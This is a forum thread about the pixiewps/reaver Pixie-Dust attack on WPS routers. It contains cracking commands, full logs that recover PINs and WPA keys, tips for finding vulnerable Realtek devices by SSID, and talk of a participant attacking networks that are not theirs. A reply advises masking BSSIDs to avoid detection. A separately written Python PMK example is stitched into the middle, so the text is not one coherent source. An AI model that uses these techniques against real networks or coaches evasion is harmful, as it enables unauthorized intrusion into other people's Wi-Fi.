Good example kcdtv. Thanks
That's a good little write-up kcdtv, very informative :-)
thank you so much for your explanation kcdtv i got it now
I realize now that there is a little trick that can be used to identify vulnerable routers very fast.
It seems that the default ssid with this Realtek SoC (RTL819X project) is.... the router model.
My totolink N301 RT has got for default ssid TOTOLINK N301RT
Then I checked the default ssid for another device that has the same SDK, the Prolink PRN3001A.
The default SSID also gives straightforward the model in this case :
What about TrendNet TEW-638AP?
They have emulator online so that fast to check :
Conclusion : if you see the model name in the essid and pixiewps suggests you to try again in brute force mode because it has a rtl819x, you should use the options start and end focusing from end 2011 to end 2012/beginning 2013 when this kind of devices were launched.
I had a look at the firmware versions for these models and I didn't see any new firmware released after 2014 for this kind of devices.
So I am pretty sure that at least by adding --start 2014 you will find the PIN and gain some time as you won't brute force from 2016 to 2014.
These devices are not old but they are already at the end of their cycle of production since some years.
It means that the manufacturer does not provide new versions of firmware and the last "build time" that is used as a seed in DH exchange is the date of the version of one of the firmware available.
Other trick, if you see an image in one manual or checking with google, the layout for the web interface with this Realtek SDK can give you a cue (if manufacturer didn't change it all)
An image is worth more than an explanation ...
Do you have an impression of déjà-vu?
Any new video for this on youtube will feature the new reaver/bully. Just search it.
Very informative thread but I must say it's a little confusing to me as i'm relatively new to kali and i'm on a Nexus 7 2013 which doesn't really make things simple.
Kali does come with pixiewps and reaver but not the latest versions, nor the mod. I believe i effed something up while I was tryin to git clone both of these as I no longer have pixiewps (neither normally from bash or from the supposed install folder /usr/local/bin), wonder if this will require the whole flash stock/flash kali etc etc...
Also I'm running a TP-Link TL-WN722N and when I try to airmon-ng start wlan1mon ... the TP-Link flashes but nothing actually shows up, unlike in @kcdtv's post on the previous page. I can stop it fine and I can pick up networks when I run wifite
Any pointers? I know it sounds rather vague... I'm just looking for general to detailed resources/articles if you happen to know some or actually written some yourselves..
thanks
Kali 2.0 Live with new Reaver and Pixie-Dust returns 2 solutions for same AP 1 minute later in every attempt.
Why would this happen ?
DATA:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx -75 399 0 0 11 54e WPA2 CCMP PSK yyy_zzzzzzzz_123456
BSSID STATION PWR Rate Lost Frames Probe
root@kali:~# reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzz_123456)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880
[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '10427880'
[Reaver Test] [+] WPA PSK: 'dc7bc520883f02b6e784772ae7340cda5c85c8b2d9f389e55 5a014277034ec16'
[Reaver Test] [+] AP SSID: 'yyy_zzzzzzzz_123456'
root@kali:~#
NEXT 1 MINUTE LATER
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzzz_123456)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880
[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '10427880'
[Reaver Test] [+] WPA PSK: 'd717380be0f1784ca16d3fc559d1a62a5e53a549cc061eb98 e708c2019e01ca0'
[Reaver Test] [+] AP SSID: 'yyy_zzzzzzzzz_123456'
root@kali:~#
Pretty sure it is a hash of the actual password. Try with Bully: https://github.com/aanarchyy/bully
can any one explain -f option in pixie wps and details about PRNG ... steps involved in PRNG attack including command .. also inform whether linksys E 900 is vulnerable to attack ??
I dunno
Same result with bully and 7 of 8 of the pin numbers.
This is not a crisis.
I thought there may be some magic code in the AP or filter when another mac associated with it.
It looked like a randomly generated 64 bit hex password.
Thanks for the reply
If you'd like, I can post the Bully log data.
Let me clarify my two posts using Reaver and Bully.
I am unable to connect to this AP with the first password solution.
So, I used Reaver with Pixiedust 1 minute apart to glean information.
There is no connect when I turn around and use my other desktop with the copied PSK on a USB.
I provided the log to show the changing (the 64 hex number) answers.
The pin number is always the same.
Reaver has worked in about 5 cases and I can connect with those routers.
There has been about 30 cases when the pin is not found or the association fails.
I may have wrongly posted the Reaver log in a different thread.
I don't think posting the Bully log will provide more helpful information.
Last edited by helen2016; 2016-03-09 at 03:48. Reason: Clarification
"It looked like a randomly generated 64 bit hex password."
That's the PMK
Yeah, you can use the 64 bit password hash just fine.
Reply to "Try with Bully" probably posted in wrong thread.
The results were the same, changing PSK and no connect.
The pin number is always the same.
My last attempt was copy and transfer the 64 PSK from laptop to desktop using TMAC V6 to spoof the client MAC obtained from airodump-ng.
Still unable to connect, but I can see the process starting and failing.
My wireless knowledge and coding ability combined with stumbling terminal syntax is far too low to go any further.
Thanks for the replies and comments.
Hm, my last consideration would either be that your wireless card is bad (which I doubt since it seems to handle reaver and bully ok up to the point of receiving the PSK) or the router does not have WPS configured (or in any event, configured properly).
First of all thanks to all the developers who have worked on this project.
Now to help helen2016 about psk.
You will need an android device.
P.s. Rooted device will be better.
Go to wifi settings.
Tap on essid. You will see a pop up to enter password. Tick advanced option. You will see Wps and dropdown box saying off. Tap on it and select pin from access point enter your Wps pin.
In less than two minutes you will be connected if Wps pin is correct and Wps is active on AP.
Now u can navigate to /data/misc/wifi/
Open wpa_supplicant.conf as text
And you can see acquired password.
Give it a try
@ alkesh
You do not need an android device : any GNU-Linux distribution (kali itself) can connect with a WPS PIN using wpa_cli from wpa_supplicant
@ Helen
You can connect with the PMK entered directly, at least with a GNU-Linux distribution (i don't know or use windows) .
Don't forget to remove the "two points"...
The passphrase is not used directly in WPA protocol, it is just for human, what is used is the PMK that you can calculate like this :
A string is created with the passphrase and ssid length, it is then passed 4096 times through SHA-1 hash function and you keep the 256 first bytes (64 hex characters) to get your PMK
PMK = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256)
It looks like a classical distance issue
Get closer to your router
And this "problem" doesn't have to do with pixiewps as the PIN is generated.
You can check the PIN on the sticker under your router
cheers
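The PMK derivation described in the post above, as an added example that is not part of the original thread: it computes PBKDF2-HMAC-SHA1 with 4096 iterations and a 32-byte (64 hex character) output, checked against the IEEE 802.11i test vector, and shows that a credential of exactly 64 hex digits is taken as the PMK itself while any other 8 to 63 character string is hashed as a passphrase. The function names and the colon-separated sample string are constructed for this illustration.

```python
import hashlib
import re

# IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def normalize_hex_key(text):
    """Drop the colons and stray whitespace that tool output and
    forum line-wrapping leave inside a hex key."""
    return re.sub(r"[\s:]", "", text).lower()


def classify_credential(text):
    """Decide how a supplicant will interpret what the user typed.

    'raw-psk'    -> exactly 64 hex digits once separators are removed
    'passphrase' -> 8..63 printable ASCII characters
    'invalid'    -> anything else
    """
    if re.fullmatch(r"[0-9a-f]{64}", normalize_hex_key(text)):
        return "raw-psk"
    if 8 <= len(text) <= 63 and all(32 <= ord(c) <= 126 for c in text):
        return "passphrase"
    return "invalid"


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, dklen=32
    )


def effective_pmk(credential, ssid):
    """Return the 32-byte key that actually enters the 4-way handshake."""
    kind = classify_credential(credential)
    if kind == "raw-psk":
        # Used as-is: the SSID plays no part for a raw 64-hex key.
        return bytes.fromhex(normalize_hex_key(credential))
    if kind == "passphrase":
        return derive_pmk(credential, ssid)
    raise ValueError("not a valid WPA passphrase or 64-hex-digit key")


def as_tool_output(pmk):
    """Constructed sample: colon-separated hex with one stray space,
    the shape a copied key often has after being pasted into a forum."""
    text = ":".join(f"{b:02x}" for b in pmk)
    return text[:50] + " " + text[50:]


if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")
    print("PMK from passphrase :", pmk.hex())
    print("matches 802.11i     :", pmk.hex() == VECTOR_PMK)

    pasted = as_tool_output(pmk)
    print("pasted key          :", pasted)
    print("interpreted as      :", classify_credential(pasted))
    print("same PMK after trim :", effective_pmk(pasted, "other-ssid") == pmk)

    # One lost digit turns the key into a 63-character "passphrase",
    # which is then hashed and can never match the access point's PMK.
    truncated = pmk.hex()[:-1]
    print("63 hex digits are a :", classify_credential(truncated))
```
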
kcdtv is right, you don't need an Android. Any linux distribution should do.
Hi,
Please, I'm trying to test Ralink RT2860 but it constantly gives me an error "wps transaction failed (0x04)" and I can't get m3 or m4 messages.
How can I get e-hashes out of this?
it may be the distance, obstacles, many factors. what airodump shows on the pwr and rqx of that ap?
The power is between -65 to -70. I also tried to test one by sitting just right next to it. I don't think it has anything with obstacle and stuff. Router is from Huawei. And reaver says:
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
Wash indicates that WPS is not locked. Super confused. Please, help?
Last edited by whitetsagan; 2016-04-13 at 15:43.
Please, anyone?
It does nothing but keeps authenticating for hours. The authentication process is always successful but at the end it creates another authentication process and so on.
Did anyone have that kind of problem with pixiewps?
Maybe WPS is enabled but not configured.
post what "airodump-ng wlan0mon --wps" gives. as soxrox said, it may not be configured
you should edit your pictures (it doesn't look like you are testing your network )
anyway your problem is not a pixiewps issues : getting the hashes is one thing handled by others programs (and you can do it yourself by having a look to your capture file) pixiewps is "just" about using this hashes to get the PIN.
Last edited by kcdtv; 2016-04-28 at 20:02.
Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network. FYI, I have got one exactly as same as this network, just not at the moment, which throws same error. Trust me on this one. :P But even though I have my own, I don't have access to the network config though.
I am well aware of that it is not about pixie. It's about reaver. Reason why I am here is nobody there to give proper answer in other discussions. And I tend to see experts who are modifying reaver prowl around here. So please share what you know about this. Have I been honest enough? I pretty much think so. :P
"Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network."
bro', i am not judging you or telling you what to do or not.
My point of view is not moral, i am not administrator or moderator of this forum and i really don't care about what you do at your home, that's not my business and i am not a cop, **** no!
The point is that if you are not in good conditions with a real knowledge about the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so much reasons... from interferences made by other clients associated to the RXQ you get, you don't even know if WPS is properly enabled,
So "experts" will tell you to get closer to access point, to disconnect all devices when you make your test, to rise delay between PIN...
I can give you an example : Spanish livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out 5, It is not a defense mechanism or something like that, just the way wps is implemented (badly)
while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1MBpS when you connect to them in the same conditions...
So if you are on "spanish livebox 2.1" kind of router, there is nothing you can do, no bug, and nothing to tell you... when i see this default ssid i imagine one of this crappy "box" with so little range that i can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
Anyway, you are not giving enough elements to answer you... scan with airodump-ng should be done with --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.
"Reason why I am here is nobody there to give proper answer in other discussions."
If this topic is about pixiewps : Do you think it is respectful for wiire who made this tool for all of us to use his thread to ask whatever you want? If everybody does like you, what would be the result?
"Have I been honest enough? I pretty much think so. :P"
You know .. be honest with your girl (or boy), be honest with your bro' and mum...but with the rest.. be clever.
Saying in a public forum that you are "hacking" network and uploading pictures with full bssid and essid of this networks is not clever.
That's why i recommend you to "edit" your pictures by erasing the end of bssid and essid... because doing like you do is like declaring to the whole world "here i am! Check this macs and essid; i live 25 meters away!"
Well, my point is: Please, reconsider the way you act in this thread, i think it is a shame to "deviate" it and this forum is full of shitty and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and more useful in this whole forum, please, respect it and help to respect it.
take care
First I saw t6x's post above somewhere in this thread and thought I could find some useful information about it because the chipset he mentioned and mine are the same.
I tried reaver on my router by sitting just right next to it and it was the same. Same error 0x04. My knowledge about this whole kali is so shallow but I am very interested in it. But it's kind of sad there is so few are to tell. I could try giving every info needed.
I understood everything so clear that you could see adele rolling from 1000 meters away. And yes, I have done a bad thing regarding morality literally. I do have respect for those who are modifying and developing for nothing, too. I actually have almost nothing to say as defense and you got me real good. But also please try to understand and consider what I am mentioning since we are in the bucket.
The same chipset doesn't mean anything. It's like saying my car has the same motor as you, why doesn't it work? Every system may be configured differently, slightly different parts, different firmware, different implementations, perhaps they are not using the reference code supplied by the chip manufacturer. There are a plethora of possible solutions to your answer, and without the proper information we can't help. We need to know the model of the AP, chipset, manufacturer, if WPS is configured or not, and if you want to really get into it, it is best if you have administrator access so we can see the configuration of it and make an assessment from there.
Dear any Solution for this issue of RTL8671? I am still waiting any update for This stupid model RTL8671.
No. There will be an update if it is supported, no need to keep asking.
you said it is an offline attack right ?
so does this mean i can bruteforce when i am far from AP ?
if i have all those parameter values.. ?
Yes it is offline. Yes you can bruteforce when you are far from the AP, but you need to have all the information gathered from it first, meaning you have to be near it at some point to get it.
Got the wps pin using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a belkin router) -a -c (insert channel number here)", tried to get the passwd using the --pin= option in reaver and it gives me a hash looking thing for the passwd. I still couldn't use that "hash" to connect to the network. I tried to disconnect all AP's from the client as well as changing my mac address to one of the AP's connected on the network, still no success. However, I couldn't help but notice that each time I tried with the passwd I got from pixie, it got NACS errors but every time I tried with a different wps pin than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon" at a version 1.0 and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.
Rtl8671 and linksys e900 is there any way to crack wps pin of above chipset??
We started a new thread for collecting data: https://forums.kali.org/showthread.p...ll=1#post75368